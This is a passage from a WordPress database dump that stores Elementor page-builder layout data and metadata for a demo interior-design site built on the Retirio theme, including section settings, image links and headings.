esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(2980,4735,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(2981,4735,'_elementor_css','a:6:{s:4:\"time\";i:1668396690;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:2;s:7:\"ovaicon\";i:5;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2982,4736,'_wp_page_template','elementor_header_footer'),(2983,4736,'_elementor_edit_mode','builder'),(2984,4736,'_elementor_template_type','wp-page'),(2985,4736,'_elementor_version','3.6.6'),(2986,4736,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\